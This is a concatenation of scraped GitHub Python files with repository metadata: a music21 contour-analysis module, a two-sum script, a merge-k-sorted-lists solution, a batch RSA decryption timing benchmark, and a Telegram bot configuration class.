plt.show()
| deepmodeling/DeePTB | dptb/postprocess/bandstructure/band.py | band.py | py | 6,701 | python | en | code | 21 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "ase.io.read",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "ase.Atoms",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "dptb.utils.make_kpoints.a... |
6128705889 | import random
import unittest
from music21 import base # for _missingImport testing.
from music21 import repeat
from music21 import exceptions21
from music21 import corpus
from music21 import environment
_MOD = 'contour.py'
environLocal = environment.Environment(_MOD)
#---------------------------------------------------
class ContourException(exceptions21.Music21Exception):
pass
class OverwriteException(exceptions21.Music21Exception):
pass
def _getExtendedModules():
'''
this is done inside a def, so that the slow import of matplotlib is not done
in ``from music21 import *`` unless it's actually needed.
Returns a tuple: (plt, numpy, sp = None)
'''
if 'matplotlib' in base._missingImport:
raise ContourException(
'could not find matplotlib, contour mapping is not allowed (numpy is also required)')
if 'numpy' in base._missingImport:
raise ContourException('could not find numpy, contour mapping is not allowed')
import matplotlib.pyplot as plt
import numpy
return (plt, numpy)
class ContourFinder:
'''
ContourFinder is a class for finding 2-dimensional contours
of a piece based on different metrics.
Predefined metrics are 'dissonance', 'tonality', and 'spacing'.
To get a contour, use ContourFinder(myStream).getContour('dissonance'), for example.
If you wish to create your own metric for giving a numerical score to a stream, you can call
ContourFinder(myStream).getContour('myMetricName', metric=myMetric)
ContourFinder looks at a moving window of m measures, and moves that window by
n measures each time.
M and n are specified by 'window' and 'slide', which are both 1 by default.
>>> s = corpus.parse('bwv29.8')
>>> ContourFinder(s).plot('tonality')
TODO: image here...
'''
def __init__(self, s=None):
self.s = s # a stream.Score object
self.sChords = None #lazy evaluation...
self.key = None
self._contours = { } #A dictionary mapping a contour type to a normalized contour dictionary
#self.metrics contains a dictionary mapping the name of a metric to a tuple (x,y)
# where x=metric function and y=needsChordify
self._metrics = {"dissonance": (self.dissonanceMetric, True),
"spacing": (self.spacingMetric, True),
"tonality": (self.tonalDistanceMetric, False) }
self.isContourFinder = True
def setKey(self, key):
'''
Sets the key of ContourFinder's internal stream. If not set manually, self.key will
be determined by self.s.analyze('key').
'''
self.key = key
def getContourValuesForMetric(self, metric, window=1, slide=1, needChordified=False):
'''
Returns a dictionary mapping measure numbers to that measure's score under
the provided metric.
Ignores pickup measures entirely.
Window is a positive integer indicating how many measure the metric should
look at at once, and slide is
a positive integer indicating by how many measures the window should slide
over each time the metric is measured.
e.g. if window=4 and slide=2, metric = f, the result will be of the form:
{ measures 1-4: f(measures 1-4),
measures 3-6: f(measures 3-6),
measures 5-8: f( measures5-8), ...}
>>> metric = lambda s: len(s.measureOffsetMap())
>>> c = corpus.parse('bwv10.7')
>>> res = ContourFinder(c).getContourValuesForMetric(metric, 3, 2, False)
>>> resList = sorted(list(res.keys()))
>>> resList
[1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21]
>>> [res[x] for x in resList]
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2]
OMIT_FROM_DOCS
>>> #set([1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21]).issubset(set(res.keys()))
'''
res = {}
if needChordified:
if self.sChords is None:
self.sChords = self.s.chordify()
s = self.sChords
else:
s = self.s
mOffsets = s.measureOffsetMap()
hasPickup = repeat.RepeatFinder(s).hasPickup()
numMeasures = len(mOffsets) - hasPickup
for i in range(1, numMeasures + 1, slide): #or numMeasures-window + 1
fragment = s.measures(i, i + window - 1)
#TODO: maybe check that i+window-1 is less than numMeasures + window / 2
resValue = metric(fragment)
res[i] = resValue
return res
#TODO: tests that use simple 4-bar pieces that we have to create...
#ALSO: Need pictures or something! Need a clear demonstration!
def getContour(self, cType, window=None, slide=None, overwrite=False,
metric=None, needsChordify=False, normalized=False):
'''
Stores and then returns a normalized contour of the type cType.
cType can be either 'spacing', 'tonality', or 'dissonance'.
If using a metric that is not predefined, cType is any string that
signifies what your metric measures.
In this case, you must pass getContour a metric function which takes
in a music21 stream and outputs a score.
If passing a metric that requires the music21 stream be just chords,
specify needsChordify=True.
Window is how many measures are considered at a time and slide is the
number of measures the window moves
over each time. By default, measure and slide are both 1.
Each time you call getContour for a cType, the result is cached.
If you wish to get the contour
for the same cType more than once, with different parameters
(with a different window and slide, for example)
then specify overwrite=True
To get a contour where measures map to the metric values,
use normalized=False (the default), but to get a contour
which evenly divides time between 1.0 and 100.0, use normalized=True
>>> cf = ContourFinder( corpus.parse('bwv10.7'))
>>> mycontour = cf.getContour('dissonance')
>>> [mycontour[x] for x in sorted(mycontour.keys())]
[0.0, 0.25, 0.5, 0.5, 0.0, 0.0, 0.25, 0.75, 0.0, 0.0, 0.5, 0.75, 0.75,
0.0, 0.5, 0.5, 0.5, 0.5, 0.75, 0.75, 0.75, 0.0]
>>> mycontour = cf.getContour('always one', 2, 2, metric= lambda x: 1.0)
>>> [mycontour[x] for x in sorted(mycontour.keys())]
[1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
>>> mycontour = cf.getContour('spacing', metric = lambda x: 2, overwrite=False)
Traceback (most recent call last):
OverwriteException: Attempted to overwrite 'spacing' metric but did
not specify overwrite=True
>>> mycontour = cf.getContour('spacing', slide=3, metric = lambda x: 2.0, overwrite=True)
>>> [mycontour[x] for x in sorted(mycontour.keys())]
[2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0]
>>> mycontour = cf.getContour('spacing')
>>> [mycontour[x] for x in sorted(mycontour.keys())]
[2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0, 2.0]
'''
if overwrite is False:
if cType in self._contours:
if window is not None or slide is not None:
raise OverwriteException(
"Attempted to overwrite cached contour of type {0}".format(cType) +
" but did not specify overwrite=True")
else:
return self._contours[cType]
elif cType in self._metrics:
if metric is not None:
raise OverwriteException("Attempted to overwrite '{0}' ".format(cType) +
"metric but did not specify overwrite=True")
else:
metric, needsChordify = self._metrics[cType]
else:
self._metrics[cType] = (metric, needsChordify)
else:
if metric is None:
if cType in self._metrics:
metric, needsChordify = self._metrics[cType]
else:
raise ContourException("Must provide your own metric for type: %s" % cType)
if slide is None:
slide = 1
if window is None:
window = 1
contour = self.getContourValuesForMetric(metric, window, slide, needsChordify)
if normalized:
contour = self._normalizeContour(contour, 100.0)
self._contours[cType] = contour
return contour
def _normalizeContour(self, contourDict, maxKey):
'''
Normalize a contour dictionary so that the values of the keys range from 0.0 to length.
>>> mycontour = { 0.0: 1.0, 3.0: 0.5, 6.0: 0.8, 9.0: 0.3, 12.0: 0.15,
... 15.0: 0.13, 18.0: 0.4, 21.0: 0.6 }
>>> res = ContourFinder()._normalizeContour(mycontour, 100)
>>> resKeys = list(res.keys())
>>> resKeys.sort()
>>> contourKeys = list(mycontour.keys())
>>> contourKeys.sort()
>>> len(contourKeys) == len(resKeys)
True
>>> x = True
>>> for i in range(len(contourKeys)):
... if mycontour[contourKeys[i]] != res[resKeys[i]]:
... x = False
>>> x
True
>>> 100.0 in res
True
>>> 0.0 in res
True
'''
myKeys = list(contourDict.keys())
myKeys.sort()
numKeys = len(myKeys)
spacing = (maxKey)/(numKeys-1.0)
res = {}
i = 0.0
for j in myKeys:
res[round(i, 3)] = round(float(contourDict[j]), 5)
i += spacing
return res
#TODO: give same args as getContour, maybe? Also, test this.
def plot(self, cType, contourIn=None, regression=True, order=4,
title='Contour Plot', fileName=None):
(plt, numpy) = _getExtendedModules()
if contourIn is None:
if cType not in self._contours:
contourIn = self.getContour(cType)
else:
contourIn = self._contours[cType]
x = list(contourIn.keys())
x.sort()
y = [contourIn[i] for i in x]
plt.plot(x, y, '.', label='contour', markersize=5)
if regression:
p = numpy.poly1d(numpy.polyfit(x, y, order))
t = numpy.linspace(0, x[-1], x[-1] + 1)
plt.plot(t, p(t), 'o-', label='estimate', markersize=1) #probably change label
plt.xlabel('Time (arbitrary units)')
plt.ylabel('Value for %s metric' % cType)
plt.title(title) #say for which piece
#plt.savefig(filename + '.png')
if fileName is not None:
plt.savefig(fileName + '.png')
else:
plt.show()
plt.clf()
def randomize(self, contourDict):
'''
Returns a version of contourDict where the keys-to-values mapping is scrambled.
>>> myDict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8, 9:9, 10:10, 11:11, 12:12, 13:13,
... 14:14, 15:15, 16:16, 17:17, 18:18, 19:19, 20:20}
>>> res = ContourFinder().randomize(myDict)
>>> res == myDict
False
>>> sorted(list(res.keys())) == sorted(list(myDict.keys()))
True
>>> sorted(list(res.values())) == sorted(list(myDict.values()))
True
'''
res = {}
myKeys = list(contourDict.keys())
myValues = list(contourDict.values())
random.shuffle(myKeys)
for i in range(len(myKeys)):
res[myKeys[i]] = myValues[i]
return res
#--- code for the metrics
def _calcGenericMetric(self, inpStream, chordMetric):
'''
Helper function which, given a metric value for a chord, calculates a metric
for a series of measures by taking the sum of each chord's metric value weighted by
its duration.
'''
score = 0
n=0
for measure in inpStream:
if 'Measure' in measure.classes:
for chord in measure:
if 'Chord' in chord.classes:
dur = chord.duration.quarterLength
score += chordMetric(chord)*dur
n += dur
if n != 0:
return score / n
else:
return None
def dissonanceMetric(self, inpStream):
'''
inpStream is a stream containing some number of measures which each contain chords.
Output is a number between 0 and 1 which is proportional to the number of dissonant chords.
To work correctly, input must contain measures and no parts.
>>> c = corpus.parse('bwv102.7').chordify()
>>> ContourFinder().dissonanceMetric( c.measures(1, 1) )
0.25
>>> ContourFinder().dissonanceMetric( c.measures(8, 8) )
0.5
>>> ContourFinder().dissonanceMetric( c.measures(1, 10)) < 1.0
True
'''
return self._calcGenericMetric(inpStream, lambda x: 1-x.isConsonant() )
def spacingMetric(self, inpStream):
'''
Defines a metric which takes a music21 stream containng measures and no parts.
This metric measures how spaced out notes in a piece are.
'''
#TODO: FIGURE OUT IF THIS IS REASONABLE! MIGHT WANT TO JUST DO: sqrt( sum(dist^2) )
def spacingForChord(chord):
pitches = [ x.ps for x in chord.pitches ]
pitches.sort()
res = 0
if len(pitches) <= 1:
return 0
elif len(pitches) == 2:
return (pitches[1] - pitches[0])
else:
res += (pitches[1] - pitches[0]) ** (0.7)
for i in range(1, len(pitches)-1):
res += (pitches[i + 1]-pitches[i]) ** (1.5)
return res
return self._calcGenericMetric(inpStream, spacingForChord)
def tonalDistanceMetric(self, inpStream):
'''
Returns a number between 0.0 and 1.0 that is a measure of how far away the key of
inpStream is from the key of ContourFinder's internal stream.
'''
if self.key is None:
self.key = self.s.analyze('key')
guessedKey = inpStream.analyze('key')
certainty = -2 #should be replaced by a value between -1 and 1
if guessedKey == self.key:
certainty = guessedKey.correlationCoefficient
else:
for pkey in guessedKey.alternateInterpretations:
if pkey == self.key:
certainty = pkey.correlationCoefficient
break
return (1 - certainty) / 2.0
class AggregateContour:
'''
An AggragateContour object is an object that stores and consolidates
contour information for a large group
of pieces.
To add a piece to the aggregate contour, use
AggregateContour.addPieceToContour(piece, cType), where cType is
the type of contour (the default possibilities are
'tonality', 'spacing', and 'dissonance'), and piece is either
a parsed music21 stream or a ContourFinder object.
To get the combined contour as list of ordered pairs, use
AggragateContour.getCombinedContour(), and to
get the combined contour as a polynomial approximation, use
AggragateContour.getCombinedContourPoly().
You can plot contours with AggragateContour.plotAggragateContour(cType).
To compare a normalized contour to the aggragate, use
AggragateContour.dissimilarityScore(cType, contour).
'''
def __init__(self, aggContours=None):
if aggContours is None:
self.aggContours = {}
# = {'spacing': [ {1:2, 2:3}, {...}, ...], 'tonality': [...], ... }
else:
self.aggContours = aggContours
self._aggContoursAsList = {}
self._aggContoursPoly = {}
def addPieceToContour(self, piece, cType, metric=None, window=1,
slide=1, order=8, needsChordify=False):
'''
Adds a piece to the aggregate contour.
piece is either a music21 stream, or a ContourFinder object (which
should have a stream wrapped inside of it).
cType is the contour type.
If using a metric that is not predefined, cType is any string
that signifies what your metric measures.
In this case, you must pass getContour a metric function
which takes in a music21 stream and outputs a score.
If passing a metric that requires the music21 stream be
just chords, specify needsChordify=True.
Window is how many measures are considered at a time and
slide is the number of measures the window moves
over each time. By default, measure and slide are both 1.
'''
if hasattr(piece, 'isContourFinder') and piece.isContourFinder:
pass
else:
piece = ContourFinder(piece)
contour = piece.getContour(cType, window=window, slide=slide,
overwrite=False, metric=metric,
needsChordify=needsChordify, normalized=True)
if cType not in self.aggContours:
self.aggContours[cType] = []
self.aggContours[cType].append(contour)
return
def getCombinedContour(self, cType): #, metric=None, window=1, slide=1, order=8):
'''
Returns the combined contour of the type specified by cType. Instead of a dictionary,
this contour is just a list of ordered pairs (tuples) with the
first value being time and the
second value being the score.
'''
if cType in self._aggContoursAsList:
return self._aggContoursAsList[cType]
elif cType in self.aggContours:
contour = self.aggContours[cType]
res = []
for contDict in contour:
res.extend( [ (x, contDict[x]) for x in contDict] )
self._aggContoursAsList[cType] = res
return res
else:
return None
def getCombinedContourPoly(self, cType, order=8):
'''
Returns the polynomial fit for the aggregate contour of type cType.
Order is the order of the resulting polynomial. e.g. For a linear regression, order=1.
'''
(unused_plt, numpy) = _getExtendedModules()
if cType in self._aggContoursPoly:
return self._aggContoursPoly[cType]
elif cType in self._aggContoursAsList:
contList = self._aggContoursAsList[cType]
elif cType in self.aggContours:
contList = self.getCombinedContour(cType)
else:
return None
x, y = zip(*contList)
self._aggContoursPoly[cType] = numpy.poly1d( numpy.polyfit(x, y, order))
return self._aggContoursPoly[cType]
def plot(self, cType, showPoints=True, comparisonContour=None, regression=True, order=6):
#TODO: maybe have an option of specifying a different
# color thing for each individual contour...
if cType not in self.aggContours: #['dissonance', 'tonality', 'distance']:
return None
else:
contour = self.getCombinedContour(cType)
# elif cType not in self._aggContoursAsList:
# contour = self.getCombinedContour(cType)
# else:
# contour = self._aggContoursAsList[cType]
#
(plt, numpy) = _getExtendedModules() #@UnusedVariable
x, y = zip(*contour)
if showPoints:
plt.plot(x, y, '.', label='contour', markersize=5)
if comparisonContour is not None:
x = comparisonContour.keys()
y = [comparisonContour[i] for i in x]
plt.plot(x, y, '.', label='compContour', markersize=8)
#p = numpy.poly1d( numpy.polyfit(x, y, order))
p = self.getCombinedContourPoly(cType)
if regression:
t = numpy.linspace(0, max(x), max(x) + 1)
plt.plot(t, p(t), 'o-', label='estimate', markersize=1) #probably change label
plt.xlabel('Time (percentage of piece)')
plt.ylabel('Value') #change this
plt.title('title') #say for which piece
#plt.savefig(filename + '.png')
plt.show()
plt.clf()
def dissimilarityScore(self, cType, contourDict):
'''
Returns a score based on how dissimilar the input contourDict is from
the aggregate contour of type cType.
Requires contourDict be normalized with values from 1.0 to 100.0
'''
p = self.getCombinedContourPoly(cType)
return sum( [abs(contourDict[x] - p(x)) for x in contourDict] )
_DOC_ORDER = [ContourFinder, AggregateContour]
def _getOutliers():
BCI = corpus.chorales.Iterator(returnType='filename')
highestNum = BCI.highestNumber
currentNum = BCI.currentNumber
lengthDict = {}
for chorale in BCI:
print(currentNum)
if currentNum is not highestNum:
currentNum = BCI.currentNumber
s = corpus.parse(chorale)
if chorale == 'bach/bwv277':
continue
elif len(s.parts) != 4:
continue
rf = repeat.RepeatFinder(s)
s = rf.simplify()
lengthDict[chorale] = len(s.measureOffsetMap()) - rf.hasPickup()
return lengthDict
def _runExperiment():
#get chorale iterator, initialize ac
ac = AggregateContour()
#unresolved problem numbers: 88 (repeatFinder fails!)
goodChorales = ['bach/bwv330', 'bach/bwv245.22', 'bach/bwv431',
'bach/bwv324', 'bach/bwv384', 'bach/bwv379', 'bach/bwv365',
'bach/bwv298', 'bach/bwv351', 'bach/bwv341', 'bach/bwv421',
'bach/bwv420', 'bach/bwv331', 'bach/bwv84.5', 'bach/bwv253',
'bach/bwv434', 'bach/bwv26.6', 'bach/bwv64.2', 'bach/bwv313',
'bach/bwv314', 'bach/bwv166.6', 'bach/bwv414', 'bach/bwv264',
'bach/bwv179.6', 'bach/bwv67.7', 'bach/bwv273', 'bach/bwv373',
'bach/bwv376', 'bach/bwv375', 'bach/bwv151.5', 'bach/bwv47.5',
'bach/bwv197.10', 'bach/bwv48.3', 'bach/bwv88.7', 'bach/bwv310',
'bach/bwv244.46', 'bach/bwv153.1', 'bach/bwv69.6', 'bach/bwv333',
'bach/bwv104.6', 'bach/bwv338', 'bach/bwv155.5', 'bach/bwv345',
'bach/bwv435', 'bach/bwv323', 'bach/bwv245.3', 'bach/bwv144.3', 'bach/bwv405',
'bach/bwv406', 'bach/bwv316', 'bach/bwv258', 'bach/bwv254',
'bach/bwv256', 'bach/bwv257', 'bach/bwv69.6-a', 'bach/bwv86.6',
'bach/bwv388', 'bach/bwv308', 'bach/bwv307', 'bach/bwv244.32',
'bach/bwv268', 'bach/bwv260', 'bach/bwv110.7', 'bach/bwv40.3',
'bach/bwv164.6', 'bach/bwv9.7', 'bach/bwv114.7', 'bach/bwv364',
'bach/bwv291', 'bach/bwv245.17', 'bach/bwv297', 'bach/bwv20.11',
'bach/bwv319', 'bach/bwv244.3', 'bach/bwv248.35-3', 'bach/bwv96.6',
'bach/bwv48.7', 'bach/bwv337', 'bach/bwv334', 'bach/bwv101.7',
'bach/bwv168.6', 'bach/bwv55.5', 'bach/bwv154.3', 'bach/bwv89.6',
'bach/bwv2.6', 'bach/bwv392', 'bach/bwv395', 'bach/bwv401', 'bach/bwv408',
'bach/bwv259', 'bach/bwv382', 'bach/bwv244.37', 'bach/bwv127.5',
'bach/bwv44.7', 'bach/bwv303', 'bach/bwv263', 'bach/bwv262',
'bach/bwv248.46-5', 'bach/bwv13.6', 'bach/bwv377', 'bach/bwv416',
'bach/bwv354', 'bach/bwv244.10', 'bach/bwv288', 'bach/bwv285',
'bach/bwv113.8', 'bach/bwv393', 'bach/bwv360', 'bach/bwv363',
'bach/bwv367', 'bach/bwv90.5', 'bach/bwv245.11', 'bach/bwv5.7',
'bach/bwv289', 'bach/bwv83.5', 'bach/bwv359', 'bach/bwv352',
'bach/bwv102.7', 'bach/bwv394', 'bach/bwv227.11', 'bach/bwv244.40',
'bach/bwv244.44', 'bach/bwv424', 'bach/bwv244.25', 'bach/bwv80.8',
'bach/bwv244.54', 'bach/bwv78.7', 'bach/bwv57.8', 'bach/bwv194.6',
'bach/bwv397', 'bach/bwv64.8', 'bach/bwv318', 'bach/bwv315',
'bach/bwv153.5', 'bach/bwv39.7', 'bach/bwv108.6', 'bach/bwv386',
'bach/bwv25.6', 'bach/bwv417', 'bach/bwv415', 'bach/bwv302',
'bach/bwv380', 'bach/bwv74.8', 'bach/bwv422', 'bach/bwv133.6',
'bach/bwv270', 'bach/bwv272', 'bach/bwv38.6', 'bach/bwv271', 'bach/bwv183.5',
'bach/bwv103.6', 'bach/bwv287', 'bach/bwv32.6', 'bach/bwv245.26',
'bach/bwv248.5', 'bach/bwv411', 'bach/bwv369', 'bach/bwv339',
'bach/bwv361', 'bach/bwv399', 'bach/bwv16.6', 'bach/bwv419',
'bach/bwv87.7', 'bach/bwv4.8', 'bach/bwv358', 'bach/bwv154.8',
'bach/bwv278', 'bach/bwv156.6', 'bach/bwv248.33-3', 'bach/bwv81.7',
'bach/bwv227.7', 'bach/bwv427', 'bach/bwv77.6', 'bach/bwv410',
'bach/bwv329', 'bach/bwv85.6', 'bach/bwv385', 'bach/bwv309',
'bach/bwv305', 'bach/bwv18.5-l', 'bach/bwv18.5-w', 'bach/bwv197.5',
'bach/bwv30.6', 'bach/bwv296', 'bach/bwv292', 'bach/bwv353',
'bach/bwv301', 'bach/bwv347',
'bach/bwv284', 'bach/bwv429', 'bach/bwv436', 'bach/bwv430',
'bach/bwv381', 'bach/bwv36.4-2', 'bach/bwv412', 'bach/bwv65.7', 'bach/bwv280',
'bach/bwv169.7', 'bach/bwv428', 'bach/bwv346', 'bach/bwv248.12-2',
'bach/bwv426',
'bach/bwv159.5', 'bach/bwv121.6', 'bach/bwv418', 'bach/bwv28.6',
'bach/bwv326', 'bach/bwv327', 'bach/bwv321', 'bach/bwv65.2',
'bach/bwv144.6', 'bach/bwv194.12', 'bach/bwv398', 'bach/bwv317',
'bach/bwv153.9', 'bach/bwv300', 'bach/bwv56.5', 'bach/bwv423',
'bach/bwv306', 'bach/bwv40.6', 'bach/bwv123.6', 'bach/bwv245.28',
'bach/bwv279', 'bach/bwv378', 'bach/bwv366', 'bach/bwv45.7', 'bach/bwv295',
'bach/bwv245.14', 'bach/bwv122.6', 'bach/bwv355', 'bach/bwv357',
'bach/bwv94.8', 'bach/bwv348', 'bach/bwv349', 'bach/bwv312',
'bach/bwv325', 'bach/bwv245.37', 'bach/bwv37.6', 'bach/bwv283',
'bach/bwv299', 'bach/bwv294', 'bach/bwv245.15', 'bach/bwv176.6',
'bach/bwv391', 'bach/bwv350', 'bach/bwv400', 'bach/bwv372',
'bach/bwv402', 'bach/bwv282', 'bach/bwv374', 'bach/bwv60.5',
'bach/bwv356', 'bach/bwv389', 'bach/bwv40.8', 'bach/bwv174.5',
'bach/bwv340', 'bach/bwv433', 'bach/bwv322', 'bach/bwv403',
'bach/bwv267', 'bach/bwv261', 'bach/bwv245.40', 'bach/bwv33.6',
'bach/bwv269', 'bach/bwv266', 'bach/bwv43.11', 'bach/bwv10.7',
'bach/bwv343', 'bach/bwv311']
currentNum = 1
#BCI = corpus.chorales.Iterator(1, 371, returnType='filename') #highest number is 371
#highestNum = BCI.highestNumber
#currentNum = BCI.currentNumber
for chorale in goodChorales:
print(currentNum)
currentNum +=1
# '''
# if chorale == 'bach/bwv277':
# continue #this chorale here has an added measure
# # container randomly in the middle which breaks things.
# '''
chorale = corpus.parse(chorale)
# '''
# if len(chorale.parts) is not 4:
# print("chorale had too many parts")
# continue
# '''
chorale = repeat.RepeatFinder(chorale).simplify()
# '''
# length = len( chorale.measureOffsetMap() )
# if length < 10:
# print("too short")
# continue
# elif length > 25:
# print("too long")
# continue
# '''
cf= ContourFinder(chorale)
ac.addPieceToContour(cf, 'dissonance')
ac.addPieceToContour(cf, 'tonality')
ac.addPieceToContour(cf, 'spacing')
print(ac.aggContours['dissonance'])
print(ac.aggContours['tonality'])
print(ac.aggContours['spacing'])
for cType in ['spacing', 'tonality', 'dissonance']:
print("considering", cType, ": ")
cf = ContourFinder()
totalSuccesses = 0
totalFailures = 0
for j in range( len(ac.aggContours[cType])):
contDict = ac.aggContours[cType][j]
observed = ac.dissimilarityScore(cType, contDict)
successes = 0
for i in range(100):
randomized = ac.dissimilarityScore( cType, cf.randomize(contDict) )
if randomized > observed:
successes += 1
if successes > 50:
totalSuccesses += 1
#print "GREAT SUCCESS!"
else:
totalFailures += 1
print("failure: chorale " + goodChorales[j]) #index ", str(i)
print(cType, ": totalSuccesses =", str(totalSuccesses),
"totalFailures =", str(totalFailures))
def _plotChoraleContours():
BCI = corpus.chorales.Iterator(1, 75, returnType='filename')
for chorale in BCI:
s = corpus.parse(chorale)
cf = ContourFinder(s)
chorale = chorale[5:]
print(chorale)
#cf.plot('dissonance', fileName= chorale + 'dissonance', regression=False)
try:
cf.plot('tonality', fileName= chorale + 'tonality', regression=False)
except exceptions21.Music21Exception:
print(chorale)
s.show()
break
pass
#------------------------
class Test(unittest.TestCase):
def runTest(self):
pass
if __name__ == "__main__":
import music21
music21.mainTest(Test, 'moduleRelative')
| cuthbertLab/music21-tools | contour/contour.py | contour.py | py | 30,165 | python | en | code | 37 | github-code | 36 | [
{
"api_name": "music21.environment.Environment",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "music21.environment",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "music21.exceptions21.Music21Exception",
"line_number": 14,
"usage_type": "attribute"
... |
39086540253 | import logging
import sys
def two_sum_sorting(numbers_set, range_start, range_end):
logger.info('Started function that uses sorting')
numbers_sorted = sorted(numbers_set)
logger.info('Done sorting')
start = 0
end = len(numbers_set) - 1
result = set()
logger.info('Entering main while loop')
while start < end:
tmp = numbers_sorted[start] + numbers_sorted[end]
if tmp > range_end:
end -= 1
elif tmp < range_start:
start += 1
else:
result.add(tmp)
for i in range(start + 1, end):
t = numbers_sorted[i] + numbers_sorted[end]
if check_in_range(t, range_start, range_end):
result.add(t)
else:
break
end -= 1
logger.info('Done looping') # approx 1.6s
return len(result)
def two_sum_hash(numbers_set, range_start, range_end):
logger.info('Started function that uses set lookup')
result = set()
for i in range(range_start, range_end):
for n in numbers_set:
if i - n in numbers_set and i - n != n:
result.add(i)
logger.info('Finished set lookup') # more than 60min
return len(result)
def check_in_range(number, range_start, range_end):
if range_start < number < range_end:
return True
else:
return False
if __name__ == '__main__':
# initialize logging to console
logger = logging.getLogger()
logger.setLevel(logging.INFO)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s.%(msecs)03d %(name)s %(levelname)s %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
# actual start
logger.info('Program started')
nums = set()
# load data
with open('algo1-programming_prob-2sum.txt') as data:
for line in data:
raw = line.strip()
if raw:
i = int(raw)
nums.add(i)
logger.info('Data loaded from file')
print(two_sum_sorting(nums, -10000, 10000))
# print(two_sum_hash(nums, -10000, 10000))
logger.info('Program end')
| nickslavsky/Algorithms-pt1 | Week 6/2sum.py | 2sum.py | py | 2,209 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 54,
"usage_type": "attribute"
},
{
"api_name": "logging.StreamHandler",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "sys.stdout"... |
4255371054 | from typing import List
from data_structures.list_node import ListNode
from heapq import *
class Solution:
def mergeKLists(self, lists: List[ListNode]) -> ListNode:
min_heap = []
for i in range(len(lists)):
curr_list = lists[i]
if curr_list:
heappush(min_heap, (curr_list.val, i, curr_list))
head, tail = None, None
while min_heap:
val, i, curr_list = heappop(min_heap)
if curr_list.next:
heappush(min_heap, (curr_list.next.val, i, curr_list.next))
if not head:
head = ListNode(val)
tail = head
else:
if not head.next:
head.next = tail
tail.next = ListNode(val)
tail = tail.next
return head
| blhwong/algos_py | leet/merge_k_sorted_lists/main.py | main.py | py | 844 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "data_structures.list_node.ListNode",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "data_structures.list_node.ListNode",
"line_number": 21,
"usage_type": "call"
},
{
"a... |
34463656888 | import mainBMRSA as Bmrsa
import mainBRSA as Brsa
import matplotlib.pyplot as plt
from useful import funcs
# number of bs
bsize = 1
while bsize < 4:
# Start from prime size = 10 bits
# mrsa and bmrsa time
itr = 10
mrsa = []
bmrsa = []
# points needed to be marked on graph
pts = [1024]
# go till 18 bits
# No of bits in key = 2 ** (n/b) * b
while itr <= 18:
n = itr
b = 2
ll = bsize
primes = funcs.generate_primes(n, b)
n = 1
for p in primes:
n *= p
m = funcs.generate_message(ll, n)
es = funcs.es(primes, ll)
timeBRSA = 0
# Get time for each BRSA
for i in range(ll):
timeBRSA += Brsa.main(primes, es[i], m[i])
# Time in milliseconds
mrsa.append(timeBRSA * 1000)
# Get time for BMRSA
timeBMRSA = Bmrsa.main(primes, es, m)
# Time in milli seconds
bmrsa.append(timeBMRSA*1000)
pts = [1024, 1536, 2048, 2560, 3072]
itr += 2
# Plotting graphs
fig, ax = plt.subplots()
# plot subplots
ax.plot(pts, mrsa, "ro-", label="BatchRSA")
ax.plot(pts, bmrsa, "bo-", label="BMRSA")
# legends in graph
legend = ax.legend(loc='upper center', shadow=True, fontsize='x-large')
# title
plt.title("Decryption time vs Key Size in bits for batch size = " + str(bsize))
plt.ylabel('Time in milliseconds')
plt.xlabel('No of Bits in key')
# display graph
plt.show()
# increase byte size
bsize += 1
| SUMUKHA-PK/RSA-efficient-variants | src/BMRSA/main.py | main.py | py | 1,574 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "useful.funcs.generate_primes",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "useful.funcs",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "useful.funcs.generate_message",
"line_number": 38,
"usage_type": "call"
},
{
"api_name"... |
4502539107 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import sys
import os
from service.singleton import Singleton
class Config(Singleton):
def __init__(self):
parser = self.__get_praser()
self.args = parser.parse_args()
self.port = self.args.port
self.token = self.args.token
self.base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
self.db_filename = os.path.join(self.base_dir, 'verify_bot.db')
self.url_prefix = self.args.url_prefix
if not self.__check_args():
parser.print_help()
sys.exit(1)
def __get_praser(self):
parser = argparse.ArgumentParser(description='VerifyBot')
parser.add_argument('-t', '--token', help='Telegram Bot token.')
parser.add_argument('-p', '--port', help='Port to listen.')
parser.add_argument('-d', '--demon', help='Run as demon.', action='store_true')
parser.add_argument('--url-prefix', help='Working url prefix. e.g. "/verifybot"', default='')
parser.add_argument('--set-web-hook', help='Set web hook.', action='store_true')
parser.add_argument('--hostname', help='WebHook hostname.')
parser.add_argument('-v', '--verbose', action='store_true', dest='verbose',
help='Enable debug info')
return parser
def __check_args(self):
if len(sys.argv) == 1:
return False
if self.args.demon:
if not self.args.port or not self.args.token:
return False
if self.args.set_web_hook:
if not self.args.token or not self.args.hostname:
return False
return True
| comzyh/VerifyBot | service/config.py | config.py | py | 1,711 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "service.singleton.Singleton",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "os.path.dirname",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "os.path.absp... |
